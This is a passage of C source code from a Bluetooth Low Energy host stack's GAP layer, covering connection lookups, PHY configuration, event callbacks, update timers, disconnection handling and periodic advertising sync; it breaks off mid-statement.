STATS_NAME(ble_gap_stats, discover_fail) STATS_NAME(ble_gap_stats, initiate) STATS_NAME(ble_gap_stats, initiate_fail) STATS_NAME(ble_gap_stats, terminate) STATS_NAME(ble_gap_stats, terminate_fail) STATS_NAME(ble_gap_stats, cancel) STATS_NAME(ble_gap_stats, cancel_fail) STATS_NAME(ble_gap_stats, update) STATS_NAME(ble_gap_stats, update_fail) STATS_NAME(ble_gap_stats, connect_mst) STATS_NAME(ble_gap_stats, connect_slv) STATS_NAME(ble_gap_stats, disconnect) STATS_NAME(ble_gap_stats, rx_disconnect) STATS_NAME(ble_gap_stats, rx_update_complete) STATS_NAME(ble_gap_stats, rx_adv_report) STATS_NAME(ble_gap_stats, rx_conn_complete) STATS_NAME(ble_gap_stats, discover_cancel) STATS_NAME(ble_gap_stats, discover_cancel_fail) STATS_NAME(ble_gap_stats, security_initiate) STATS_NAME(ble_gap_stats, security_initiate_fail) STATS_NAME_END(ble_gap_stats) /***************************************************************************** * $debug * *****************************************************************************/ #if MYNEWT_VAL(BLE_HS_DEBUG) int ble_gap_dbg_update_active(uint16_t conn_handle) { const struct ble_gap_update_entry *entry; ble_hs_lock(); entry = ble_gap_update_entry_find(conn_handle, NULL); ble_hs_unlock(); return entry != NULL; } #endif /***************************************************************************** * $log * *****************************************************************************/ #if NIMBLE_BLE_SCAN && !MYNEWT_VAL(BLE_EXT_ADV) static void ble_gap_log_duration(int32_t duration_ms) { if (duration_ms == BLE_HS_FOREVER) { BLE_HS_LOG(INFO, "duration=forever"); } else { BLE_HS_LOG(INFO, "duration=%dms", duration_ms); } } #endif #if MYNEWT_VAL(BLE_ROLE_CENTRAL) && !MYNEWT_VAL(BLE_EXT_ADV) static void ble_gap_log_conn(uint8_t own_addr_type, const ble_addr_t *peer_addr, const struct ble_gap_conn_params *params) { if (peer_addr != NULL) { BLE_HS_LOG(INFO, "peer_addr_type=%d peer_addr=", peer_addr->type); BLE_HS_LOG_ADDR(INFO, peer_addr->val); } BLE_HS_LOG(INFO, " scan_itvl=%d scan_window=%d itvl_min=%d itvl_max=%d " "latency=%d supervision_timeout=%d min_ce_len=%d " "max_ce_len=%d own_addr_type=%d", params->scan_itvl, params->scan_window, params->itvl_min, params->itvl_max, params->latency, params->supervision_timeout, params->min_ce_len, params->max_ce_len, own_addr_type); } #endif #if NIMBLE_BLE_SCAN && !MYNEWT_VAL(BLE_EXT_ADV) static void ble_gap_log_disc(uint8_t own_addr_type, int32_t duration_ms, const struct ble_gap_disc_params *disc_params) { BLE_HS_LOG(INFO, "own_addr_type=%d filter_policy=%d passive=%d limited=%d " "filter_duplicates=%d ", own_addr_type, disc_params->filter_policy, disc_params->passive, disc_params->limited, disc_params->filter_duplicates); ble_gap_log_duration(duration_ms); } #endif #if NIMBLE_BLE_CONNECT static void ble_gap_log_update(uint16_t conn_handle, const struct ble_gap_upd_params *params) { BLE_HS_LOG(INFO, "connection parameter update; " "conn_handle=%d itvl_min=%d itvl_max=%d latency=%d " "supervision_timeout=%d min_ce_len=%d max_ce_len=%d", conn_handle, params->itvl_min, params->itvl_max, params->latency, params->supervision_timeout, params->min_ce_len, params->max_ce_len); } #endif #if MYNEWT_VAL(BLE_WHITELIST) static void ble_gap_log_wl(const ble_addr_t *addr, uint8_t white_list_count) { int i; BLE_HS_LOG(INFO, "count=%d ", white_list_count); for (i = 0; i < white_list_count; i++, addr++) { BLE_HS_LOG(INFO, "entry-%d={addr_type=%d addr=", i, addr->type); BLE_HS_LOG_ADDR(INFO, addr->val); BLE_HS_LOG(INFO, "} "); } } #endif #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) static void ble_gap_log_adv(uint8_t own_addr_type, const ble_addr_t *direct_addr, const struct ble_gap_adv_params *adv_params) { BLE_HS_LOG(INFO, "disc_mode=%d", adv_params->disc_mode); if (direct_addr) { BLE_HS_LOG(INFO, " direct_addr_type=%d direct_addr=", direct_addr->type); BLE_HS_LOG_ADDR(INFO, direct_addr->val); } BLE_HS_LOG(INFO, " adv_channel_map=%d own_addr_type=%d " "adv_filter_policy=%d adv_itvl_min=%d adv_itvl_max=%d", adv_params->channel_map, own_addr_type, adv_params->filter_policy, adv_params->itvl_min, adv_params->itvl_max); } #endif /***************************************************************************** * $snapshot * *****************************************************************************/ static void ble_gap_fill_conn_desc(struct ble_hs_conn *conn, struct ble_gap_conn_desc *desc) { struct ble_hs_conn_addrs addrs; ble_hs_conn_addrs(conn, &addrs); desc->our_id_addr = addrs.our_id_addr; desc->peer_id_addr = addrs.peer_id_addr; desc->our_ota_addr = addrs.our_ota_addr; desc->peer_ota_addr = addrs.peer_ota_addr; desc->conn_handle = conn->bhc_handle; desc->conn_itvl = conn->bhc_itvl; desc->conn_latency = conn->bhc_latency; desc->supervision_timeout = conn->bhc_supervision_timeout; desc->master_clock_accuracy = conn->bhc_master_clock_accuracy; desc->sec_state = conn->bhc_sec_state; if (conn->bhc_flags & BLE_HS_CONN_F_MASTER) { desc->role = BLE_GAP_ROLE_MASTER; } else { desc->role = BLE_GAP_ROLE_SLAVE; } } static void ble_gap_conn_to_snapshot(struct ble_hs_conn *conn, struct ble_gap_snapshot *snap) { ble_gap_fill_conn_desc(conn, snap->desc); snap->cb = conn->bhc_cb; snap->cb_arg = conn->bhc_cb_arg; } static int ble_gap_find_snapshot(uint16_t handle, struct ble_gap_snapshot *snap) { struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find(handle); if (conn != NULL) { ble_gap_conn_to_snapshot(conn, snap); } ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } else { return 0; } } int ble_gap_conn_find(uint16_t handle, struct ble_gap_conn_desc *out_desc) { struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find(handle); if (conn != NULL && out_desc != NULL) { ble_gap_fill_conn_desc(conn, out_desc); } ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } else { return 0; } } int ble_gap_conn_find_by_addr(const ble_addr_t *addr, struct ble_gap_conn_desc *out_desc) { struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find_by_addr(addr); if (conn != NULL && out_desc != NULL) { ble_gap_fill_conn_desc(conn, out_desc); } ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } return 0; } static int ble_gap_extract_conn_cb(uint16_t conn_handle, ble_gap_event_fn **out_cb, void **out_cb_arg) { const struct ble_hs_conn *conn; BLE_HS_DBG_ASSERT(conn_handle <= BLE_HCI_LE_CONN_HANDLE_MAX); ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (conn != NULL) { *out_cb = conn->bhc_cb; *out_cb_arg = conn->bhc_cb_arg; } else { *out_cb = NULL; *out_cb_arg = NULL; } ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } else { return 0; } } int ble_gap_set_priv_mode(const ble_addr_t *peer_addr, uint8_t priv_mode) { return ble_hs_pvcy_set_mode(peer_addr, priv_mode); } int ble_gap_read_le_phy(uint16_t conn_handle, uint8_t *tx_phy, uint8_t *rx_phy) { struct ble_hci_le_rd_phy_cp cmd; struct ble_hci_le_rd_phy_rp rsp; struct ble_hs_conn *conn; int rc; ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } cmd.conn_handle = htole16(conn_handle); rc = ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_RD_PHY), &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (rc != 0) { return rc; } /* sanity check for response */ if (le16toh(rsp.conn_handle) != conn_handle) { return BLE_HS_ECONTROLLER; } *tx_phy = rsp.tx_phy; *rx_phy = rsp.rx_phy; return 0; } int ble_gap_set_prefered_default_le_phy(uint8_t tx_phys_mask, uint8_t rx_phys_mask) { struct ble_hci_le_set_default_phy_cp cmd; if (tx_phys_mask > (BLE_HCI_LE_PHY_1M_PREF_MASK | BLE_HCI_LE_PHY_2M_PREF_MASK | BLE_HCI_LE_PHY_CODED_PREF_MASK)) { return BLE_ERR_INV_HCI_CMD_PARMS; } if (rx_phys_mask > (BLE_HCI_LE_PHY_1M_PREF_MASK | BLE_HCI_LE_PHY_2M_PREF_MASK | BLE_HCI_LE_PHY_CODED_PREF_MASK)) { return BLE_ERR_INV_HCI_CMD_PARMS; } memset(&cmd, 0, sizeof(cmd)); if (tx_phys_mask == 0) { cmd.all_phys |= BLE_HCI_LE_PHY_NO_TX_PREF_MASK; } else { cmd.tx_phys = tx_phys_mask; } if (rx_phys_mask == 0) { cmd.all_phys |= BLE_HCI_LE_PHY_NO_RX_PREF_MASK; } else { cmd.rx_phys = rx_phys_mask; } return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_DEFAULT_PHY), &cmd, sizeof(cmd), NULL, 0); } int ble_gap_set_prefered_le_phy(uint16_t conn_handle, uint8_t tx_phys_mask, uint8_t rx_phys_mask, uint16_t phy_opts) { struct ble_hci_le_set_phy_cp cmd; struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } if (tx_phys_mask > (BLE_HCI_LE_PHY_1M_PREF_MASK | BLE_HCI_LE_PHY_2M_PREF_MASK | BLE_HCI_LE_PHY_CODED_PREF_MASK)) { return BLE_ERR_INV_HCI_CMD_PARMS; } if (rx_phys_mask > (BLE_HCI_LE_PHY_1M_PREF_MASK | BLE_HCI_LE_PHY_2M_PREF_MASK | BLE_HCI_LE_PHY_CODED_PREF_MASK)) { return BLE_ERR_INV_HCI_CMD_PARMS; } if (phy_opts > BLE_HCI_LE_PHY_CODED_S8_PREF) { return BLE_ERR_INV_HCI_CMD_PARMS; } memset(&cmd, 0, sizeof(cmd)); cmd.conn_handle = htole16(conn_handle); if (tx_phys_mask == 0) { cmd.all_phys |= BLE_HCI_LE_PHY_NO_TX_PREF_MASK; } else { cmd.tx_phys = tx_phys_mask; } if (rx_phys_mask == 0) { cmd.all_phys |= BLE_HCI_LE_PHY_NO_RX_PREF_MASK; } else { cmd.rx_phys = rx_phys_mask; } cmd.phy_options = htole16(phy_opts); return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_PHY), &cmd, sizeof(cmd), NULL, 0); } /***************************************************************************** * $misc * *****************************************************************************/ static int ble_gap_event_listener_call(struct ble_gap_event *event); static int ble_gap_call_event_cb(struct ble_gap_event *event, ble_gap_event_fn *cb, void *cb_arg) { int rc; BLE_HS_DBG_ASSERT(!ble_hs_locked_by_cur_task()); if (cb != NULL) { rc = cb(event, cb_arg); } else { if (event->type == BLE_GAP_EVENT_CONN_UPDATE_REQ) { /* Just copy peer parameters back into the reply. */ *event->conn_update_req.self_params = *event->conn_update_req.peer_params; } rc = 0; } return rc; } static int ble_gap_call_conn_event_cb(struct ble_gap_event *event, uint16_t conn_handle) { ble_gap_event_fn *cb; void *cb_arg; int rc; rc = ble_gap_extract_conn_cb(conn_handle, &cb, &cb_arg); if (rc != 0) { return rc; } rc = ble_gap_call_event_cb(event, cb, cb_arg); if (rc != 0) { return rc; } return 0; } static bool ble_gap_is_preempted(void) { int i; BLE_HS_DBG_ASSERT(ble_hs_locked_by_cur_task()); if (ble_gap_master.preempted_op != BLE_GAP_OP_NULL) { return true; } for (i = 0; i < BLE_ADV_INSTANCES; i++) { if (ble_gap_slave[i].preempted) { return true; } } return false; } #if NIMBLE_BLE_CONNECT static void ble_gap_master_reset_state(void) { ble_gap_master.op = BLE_GAP_OP_NULL; ble_gap_master.exp_set = 0; ble_gap_master.conn.cancel = 0; ble_hs_timer_resched(); } #endif static void ble_gap_slave_reset_state(uint8_t instance) { ble_gap_slave[instance].op = BLE_GAP_OP_NULL; #if !MYNEWT_VAL(BLE_EXT_ADV) ble_gap_slave[instance].exp_set = 0; ble_hs_timer_resched(); #endif } #if NIMBLE_BLE_CONNECT static bool ble_gap_has_client(struct ble_gap_master_state *out_state) { if (!out_state) { return 0; } return out_state->cb; } static void ble_gap_master_extract_state(struct ble_gap_master_state *out_state, int reset_state) { ble_hs_lock(); *out_state = ble_gap_master; if (reset_state) { ble_gap_master_reset_state(); ble_gap_master.preempted_op = BLE_GAP_OP_NULL; } ble_hs_unlock(); } #endif static void ble_gap_slave_extract_cb(uint8_t instance, ble_gap_event_fn **out_cb, void **out_cb_arg) { ble_hs_lock(); *out_cb = ble_gap_slave[instance].cb; *out_cb_arg = ble_gap_slave[instance].cb_arg; ble_gap_slave_reset_state(instance); ble_hs_unlock(); } static void ble_gap_adv_finished(uint8_t instance, int reason, uint16_t conn_handle, uint8_t num_events) { struct ble_gap_event event; ble_gap_event_fn *cb; void *cb_arg; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_ADV_COMPLETE; event.adv_complete.reason = reason; #if MYNEWT_VAL(BLE_EXT_ADV) event.adv_complete.instance = instance; event.adv_complete.conn_handle = conn_handle; event.adv_complete.num_ext_adv_events = num_events; #endif ble_gap_event_listener_call(&event); ble_gap_slave_extract_cb(instance, &cb, &cb_arg); if (cb != NULL) { cb(&event, cb_arg); } } #if NIMBLE_BLE_CONNECT static int ble_gap_master_connect_failure(int status) { struct ble_gap_master_state state; struct ble_gap_event event; int rc; ble_gap_master_extract_state(&state, 1); if (ble_gap_has_client(&state)) { memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_CONNECT; event.connect.status = status; rc = state.cb(&event, state.cb_arg); } else { rc = 0; } return rc; } static void ble_gap_master_connect_cancelled(void) { struct ble_gap_master_state state; struct ble_gap_event event; ble_gap_master_extract_state(&state, 1); if (state.cb != NULL) { memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_CONNECT; event.connect.conn_handle = BLE_HS_CONN_HANDLE_NONE; if (state.conn.cancel) { /* Connect procedure successfully cancelled. */ event.connect.status = BLE_HS_EAPP; } else { /* Connect procedure timed out. */ event.connect.status = BLE_HS_ETIMEOUT; } state.cb(&event, state.cb_arg); } } #endif #if NIMBLE_BLE_SCAN static void ble_gap_disc_report(void *desc) { struct ble_gap_master_state state; struct ble_gap_event event; memset(&event, 0, sizeof event); #if MYNEWT_VAL(BLE_EXT_ADV) event.type = BLE_GAP_EVENT_EXT_DISC; event.ext_disc = *((struct ble_gap_ext_disc_desc *)desc); #else event.type = BLE_GAP_EVENT_DISC; event.disc = *((struct ble_gap_disc_desc *)desc); #endif ble_gap_master_extract_state(&state, 0); if (ble_gap_has_client(&state)) { state.cb(&event, state.cb_arg); } ble_gap_event_listener_call(&event); } static void ble_gap_disc_complete(void) { struct ble_gap_master_state state; struct ble_gap_event event; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_DISC_COMPLETE; event.disc_complete.reason = 0; ble_gap_master_extract_state(&state, 1); if (ble_gap_has_client(&state)) { ble_gap_call_event_cb(&event, state.cb, state.cb_arg); } ble_gap_event_listener_call(&event); } #endif static void ble_gap_update_notify(uint16_t conn_handle, int status) { struct ble_gap_event event; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_CONN_UPDATE; event.conn_update.conn_handle = conn_handle; event.conn_update.status = status; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); /* Terminate the connection on procedure timeout. */ if (status == BLE_HS_ETIMEOUT) { ble_gap_terminate(conn_handle, BLE_ERR_REM_USER_CONN_TERM); } } static uint32_t ble_gap_master_ticks_until_exp(void) { ble_npl_stime_t ticks; if (ble_gap_master.op == BLE_GAP_OP_NULL || !ble_gap_master.exp_set) { /* Timer not set; infinity ticks until next event. */ return BLE_HS_FOREVER; } ticks = ble_gap_master.exp_os_ticks - ble_npl_time_get(); if (ticks > 0) { /* Timer not expired yet. */ return ticks; } /* Timer just expired. */ return 0; } #if !MYNEWT_VAL(BLE_EXT_ADV) static uint32_t ble_gap_slave_ticks_until_exp(void) { ble_npl_stime_t ticks; if (ble_gap_slave[0].op == BLE_GAP_OP_NULL || !ble_gap_slave[0].exp_set) { /* Timer not set; infinity ticks until next event. */ return BLE_HS_FOREVER; } ticks = ble_gap_slave[0].exp_os_ticks - ble_npl_time_get(); if (ticks > 0) { /* Timer not expired yet. */ return ticks; } /* Timer just expired. */ return 0; } #endif /** * Finds the update procedure that expires soonest. * * @param out_ticks_from_now On success, the ticks until the update * procedure's expiry time gets written here. * * @return The connection handle of the update procedure * that expires soonest, or * BLE_HS_CONN_HANDLE_NONE if there are no * active update procedures. */ static uint16_t ble_gap_update_next_exp(int32_t *out_ticks_from_now) { struct ble_gap_update_entry *entry; ble_npl_time_t now; uint16_t conn_handle; int32_t best_ticks; int32_t ticks; BLE_HS_DBG_ASSERT(ble_hs_locked_by_cur_task()); conn_handle = BLE_HS_CONN_HANDLE_NONE; best_ticks = BLE_HS_FOREVER; now = ble_npl_time_get(); SLIST_FOREACH(entry, &ble_gap_update_entries, next) { ticks = entry->exp_os_ticks - now; if (ticks <= 0) { ticks = 0; } if (ticks < best_ticks) { conn_handle = entry->conn_handle; best_ticks = ticks; } } if (out_ticks_from_now != NULL) { *out_ticks_from_now = best_ticks; } return conn_handle; } #if NIMBLE_BLE_SCAN static void ble_gap_master_set_timer(uint32_t ticks_from_now) { ble_gap_master.exp_os_ticks = ble_npl_time_get() + ticks_from_now; ble_gap_master.exp_set = 1; ble_hs_timer_resched(); } #endif #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) static void ble_gap_slave_set_timer(uint32_t ticks_from_now) { ble_gap_slave[0].exp_os_ticks = ble_npl_time_get() + ticks_from_now; ble_gap_slave[0].exp_set = 1; ble_hs_timer_resched(); } #endif #if (NIMBLE_BLE_CONNECT || NIMBLE_BLE_SCAN) /** * Called when an error is encountered while the master-connection-fsm is * active. */ static void ble_gap_master_failed(int status) { switch (ble_gap_master.op) { case BLE_GAP_OP_M_CONN: STATS_INC(ble_gap_stats, initiate_fail); ble_gap_master_connect_failure(status); break; #if NIMBLE_BLE_SCAN case BLE_GAP_OP_M_DISC: STATS_INC(ble_gap_stats, initiate_fail); ble_gap_disc_complete(); ble_gap_master_reset_state(); break; #endif default: BLE_HS_DBG_ASSERT(0); break; } } #endif #if NIMBLE_BLE_CONNECT static void ble_gap_update_failed(uint16_t conn_handle, int status) { struct ble_gap_update_entry *entry; STATS_INC(ble_gap_stats, update_fail); ble_hs_lock(); entry = ble_gap_update_entry_remove(conn_handle); ble_hs_unlock(); ble_gap_update_entry_free(entry); ble_gap_update_notify(conn_handle, status); } #endif void ble_gap_conn_broken(uint16_t conn_handle, int reason) { struct ble_gap_update_entry *entry; struct ble_gap_snapshot snap; struct ble_gap_event event; int rc; memset(&event, 0, sizeof event); snap.desc = &event.disconnect.conn; rc = ble_gap_find_snapshot(conn_handle, &snap); if (rc != 0) { /* No longer connected. */ return; } /* If there was a connection update in progress, indicate to the * application that it did not complete. */ ble_hs_lock(); entry = ble_gap_update_entry_remove(conn_handle); ble_hs_unlock(); if (entry != NULL) { ble_gap_update_notify(conn_handle, reason); ble_gap_update_entry_free(entry); } /* Indicate the connection termination to each module. The order matters * here: gatts must come before gattc to ensure the application does not * get informed of spurious notify-tx events. */ ble_l2cap_sig_conn_broken(conn_handle, reason); ble_sm_connection_broken(conn_handle); ble_gatts_connection_broken(conn_handle); ble_gattc_connection_broken(conn_handle); ble_hs_flow_connection_broken(conn_handle);; ble_hs_atomic_conn_delete(conn_handle); event.type = BLE_GAP_EVENT_DISCONNECT; event.disconnect.reason = reason; ble_gap_event_listener_call(&event); ble_gap_call_event_cb(&event, snap.cb, snap.cb_arg); STATS_INC(ble_gap_stats, disconnect); } #if NIMBLE_BLE_CONNECT static void ble_gap_update_to_l2cap(const struct ble_gap_upd_params *params, struct ble_l2cap_sig_update_params *l2cap_params) { l2cap_params->itvl_min = params->itvl_min; l2cap_params->itvl_max = params->itvl_max; l2cap_params->slave_latency = params->latency; l2cap_params->timeout_multiplier = params->supervision_timeout; } #endif void ble_gap_rx_disconn_complete(const struct ble_hci_ev_disconn_cmp *ev) { #if NIMBLE_BLE_CONNECT struct ble_gap_event event; uint16_t handle = le16toh(ev->conn_handle); STATS_INC(ble_gap_stats, rx_disconnect); if (ev->status == 0) { ble_gap_conn_broken(handle, BLE_HS_HCI_ERR(ev->reason)); } else { memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_TERM_FAILURE; event.term_failure.conn_handle = handle; event.term_failure.status = BLE_HS_HCI_ERR(ev->status); ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, handle); } #endif } void ble_gap_rx_update_complete(const struct ble_hci_ev_le_subev_conn_upd_complete *ev) { #if NIMBLE_BLE_CONNECT struct ble_gap_update_entry *entry; struct ble_l2cap_sig_update_params l2cap_params; struct ble_gap_event event; struct ble_hs_conn *conn; uint16_t conn_handle; int cb_status; int call_cb; int rc; STATS_INC(ble_gap_stats, rx_update_complete); memset(&event, 0, sizeof event); memset(&l2cap_params, 0, sizeof l2cap_params); ble_hs_lock(); conn_handle = le16toh(ev->conn_handle); conn = ble_hs_conn_find(conn_handle); if (conn != NULL) { switch (ev->status) { case 0: /* Connection successfully updated. */ conn->bhc_itvl = le16toh(ev->conn_itvl); conn->bhc_latency = le16toh(ev->conn_latency); conn->bhc_supervision_timeout = le16toh(ev->supervision_timeout); break; case BLE_ERR_UNSUPP_REM_FEATURE: /* Peer reports that it doesn't support the procedure. This should * only happen if our controller sent the 4.1 Connection Parameters * Request Procedure. If we are the slave, fail over to the L2CAP * update procedure. */ entry = ble_gap_update_entry_find(conn_handle, NULL); if (entry != NULL && !(conn->bhc_flags & BLE_HS_CONN_F_MASTER)) { ble_gap_update_to_l2cap(&entry->params, &l2cap_params); entry->exp_os_ticks = ble_npl_time_get() + ble_npl_time_ms_to_ticks32(BLE_GAP_UPDATE_TIMEOUT_MS); } break; default: break; } } /* We aren't failing over to L2CAP, the update procedure is complete. */ if (l2cap_params.itvl_min == 0) { entry = ble_gap_update_entry_remove(conn_handle); ble_gap_update_entry_free(entry); } ble_hs_unlock(); if (l2cap_params.itvl_min != 0) { rc = ble_l2cap_sig_update(conn_handle, &l2cap_params, ble_gap_update_l2cap_cb, NULL); if (rc == 0) { call_cb = 0; } else { call_cb = 1; cb_status = rc; } } else { call_cb = 1; cb_status = BLE_HS_HCI_ERR(ev->status); } if (call_cb) { ble_gap_update_notify(conn_handle, cb_status); } #endif } /** * Tells you if there is an active central GAP procedure (connect or discover). */ int ble_gap_master_in_progress(void) { return ble_gap_master.op != BLE_GAP_OP_NULL; } static int ble_gap_adv_active_instance(uint8_t instance) { /* Assume read is atomic; mutex not necessary. */ return ble_gap_slave[instance].op == BLE_GAP_OP_S_ADV; } /** * Clears advertisement and discovery state. This function is necessary * when the controller loses its active state (e.g. on stack reset). */ void ble_gap_reset_state(int reason) { uint16_t conn_handle; while (1) { conn_handle = ble_hs_atomic_first_conn_handle(); if (conn_handle == BLE_HS_CONN_HANDLE_NONE) { break; } ble_gap_conn_broken(conn_handle, reason); } #if NIMBLE_BLE_ADVERTISE #if MYNEWT_VAL(BLE_EXT_ADV) uint8_t i; for (i = 0; i < BLE_ADV_INSTANCES; i++) { if (ble_gap_adv_active_instance(i)) { /* Indicate to application that advertising has stopped. */ ble_gap_adv_finished(i, reason, 0, 0); } } #else if (ble_gap_adv_active_instance(0)) { /* Indicate to application that advertising has stopped. */ ble_gap_adv_finished(0, reason, 0, 0); } #endif #endif #if (NIMBLE_BLE_SCAN || NIMBLE_BLE_CONNECT) ble_gap_master_failed(reason); #endif } #if NIMBLE_BLE_CONNECT static int ble_gap_accept_master_conn(void) { int rc; switch (ble_gap_master.op) { case BLE_GAP_OP_NULL: case BLE_GAP_OP_M_DISC: rc = BLE_HS_ENOENT; break; case BLE_GAP_OP_M_CONN: rc = 0; break; default: BLE_HS_DBG_ASSERT(0); rc = BLE_HS_ENOENT; break; } if (rc == 0) { STATS_INC(ble_gap_stats, connect_mst); } return rc; } static int ble_gap_accept_slave_conn(uint8_t instance) { int rc; if (instance >= BLE_ADV_INSTANCES) { rc = BLE_HS_ENOENT; } else if (!ble_gap_adv_active_instance(instance)) { rc = BLE_HS_ENOENT; } else { if (ble_gap_slave[instance].connectable) { rc = 0; } else { rc = BLE_HS_ENOENT; } } if (rc == 0) { STATS_INC(ble_gap_stats, connect_slv); } return rc; } #endif #if NIMBLE_BLE_SCAN static int ble_gap_rx_adv_report_sanity_check(const uint8_t *adv_data, uint8_t adv_data_len) { const struct ble_hs_adv_field *flags; int rc; STATS_INC(ble_gap_stats, rx_adv_report); if (ble_gap_master.op != BLE_GAP_OP_M_DISC) { return -1; } /* If a limited discovery procedure is active, discard non-limited * advertisements. */ if (ble_gap_master.disc.limited) { rc = ble_hs_adv_find_field(BLE_HS_ADV_TYPE_FLAGS, adv_data, adv_data_len, &flags); if ((rc == 0) && (flags->length == 2) && !(flags->value[0] & BLE_HS_ADV_F_DISC_LTD)) { return -1; } } return 0; } #endif void ble_gap_rx_adv_report(struct ble_gap_disc_desc *desc) { #if NIMBLE_BLE_SCAN if (ble_gap_rx_adv_report_sanity_check(desc->data, desc->length_data)) { return; } ble_gap_disc_report(desc); #endif } #if MYNEWT_VAL(BLE_EXT_ADV) #if NIMBLE_BLE_SCAN void ble_gap_rx_le_scan_timeout(void) { ble_gap_disc_complete(); } void ble_gap_rx_ext_adv_report(struct ble_gap_ext_disc_desc *desc) { if (ble_gap_rx_adv_report_sanity_check(desc->data, desc->length_data)) { return; } ble_gap_disc_report(desc); } #endif void ble_gap_rx_adv_set_terminated(const struct ble_hci_ev_le_subev_adv_set_terminated *ev) { uint16_t conn_handle; int reason; /* Currently spec allows only 0x3c and 0x43 when advertising was stopped * due to timeout or events limit, mp this for timeout error for now */ if (ev->status) { reason = BLE_HS_ETIMEOUT; conn_handle = 0; } else { reason = 0; conn_handle = le16toh(ev->conn_handle); } ble_gap_adv_finished(ev->adv_handle, reason, conn_handle, ev->num_events); } void ble_gap_rx_scan_req_rcvd(const struct ble_hci_ev_le_subev_scan_req_rcvd *ev) { struct ble_gap_event event; ble_gap_event_fn *cb; void *cb_arg; ble_gap_slave_extract_cb(ev->adv_handle, &cb, &cb_arg); if (cb != NULL) { memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_SCAN_REQ_RCVD; event.scan_req_rcvd.instance = ev->adv_handle; event.scan_req_rcvd.scan_addr.type = ev->peer_addr_type; memcpy(event.scan_req_rcvd.scan_addr.val, ev->peer_addr, BLE_DEV_ADDR_LEN); cb(&event, cb_arg); } } #endif /* Periodic adv events */ #if MYNEWT_VAL(BLE_PERIODIC_ADV) void ble_gap_rx_peroidic_adv_sync_estab(const struct ble_hci_ev_le_subev_periodic_adv_sync_estab *ev) { uint16_t sync_handle; struct ble_gap_event event; ble_gap_event_fn *cb; void *cb_arg; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_PERIODIC_SYNC; event.periodic_sync.status = ev->status; ble_hs_lock(); BLE_HS_DBG_ASSERT(ble_gap_sync.psync); if (!ev->status) { sync_handle = le16toh(ev->sync_handle); ble_gap_sync.psync->sync_handle = sync_handle; ble_gap_sync.psync->adv_sid = ev->sid; memcpy(ble_gap_sync.psync->advertiser_addr.val, ev->peer_addr, 6); ble_gap_sync.psync->advertiser_addr.type = ev->peer_addr_type; ble_gap_sync.psync->cb = ble_gap_sync.cb; ble_gap_sync.psync->cb_arg = ble_gap_sync.cb_arg; event.periodic_sync.sync_handle = sync_handle; event.periodic_sync.sid = ev->sid; event.periodic_sync.adv_addr = ble_gap_sync.psync->advertiser_addr; event.periodic_sync.adv_phy = ev->phy; event.periodic_sync.per_adv_ival = ev->interval; event.periodic_sync.adv_clk_accuracy = ev->aca; ble_hs_periodic_sync_insert(ble_gap_sync.psync); } else { ble_hs_periodic_sync_free(ble_gap_sync.psync); } cb = ble_gap_sync.cb; cb_arg = ble_gap_sync.cb_arg; ble_gap_sync.op = BLE_GAP_OP_NULL; ble_gap_sync.cb_arg = NULL; ble_gap_sync.cb_arg = NULL; ble_gap_sync.psync = NULL; ble_hs_unlock(); ble_gap_event_listener_call(&event); if (cb) { cb(&event, cb_arg); } } void ble_gap_rx_periodic_adv_rpt(const struct ble_hci_ev_le_subev_periodic_adv_rpt *ev) { struct ble_hs_periodic_sync *psync; struct ble_gap_event event; ble_gap_event_fn *cb; void *cb_arg; ble_hs_lock(); psync = ble_hs_periodic_sync_find_by_handle(le16toh(ev->sync_handle)); if (psync) { cb = psync->cb; cb_arg = psync->cb_arg; } ble_hs_unlock(); if (!psync || !cb) { return; } memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_PERIODIC_REPORT; event.periodic_report.sync_handle = psync->sync_handle; event.periodic_report.tx_power = ev->tx_power; event.periodic_report.rssi = ev->rssi; event.periodic_report.data_status = ev->data_status; event.periodic_report.data_length = ev->data_len; event.periodic_report.data = ev->data; /* TODO should we allow for listener too? this can be spammy and is more * like ACL data, not general event */ cb(&event, cb_arg); } void ble_gap_rx_periodic_adv_sync_lost(const struct ble_hci_ev_le_subev_periodic_adv_sync_lost *ev) { struct ble_hs_periodic_sync *psync; struct ble_gap_event event; ble_gap_event_fn *cb; void *cb_arg; ble_hs_lock(); /* The handle must be in the list */ psync = ble_hs_periodic_sync_find_by_handle(le16toh(ev->sync_handle)); BLE_HS_DBG_ASSERT(psync); cb = psync->cb; cb_arg = psync->cb_arg; /* Remove the handle from the list */ ble_hs_periodic_sync_remove(psync); ble_hs_unlock(); memset(&event, 0, sizeof event); event.type = 